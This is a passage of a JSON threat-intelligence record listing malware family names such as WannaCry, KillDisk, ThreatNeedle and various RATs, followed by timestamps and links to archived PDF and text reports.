				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434287,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/392c0d65d86c9e8426d91d0d082485dcbb8c082a.pdf",
		"text": "https://archive.orkl.eu/392c0d65d86c9e8426d91d0d082485dcbb8c082a.txt",
		"img": "https://archive.orkl.eu/392c0d65d86c9e8426d91d0d082485dcbb8c082a.jpg"
	}
}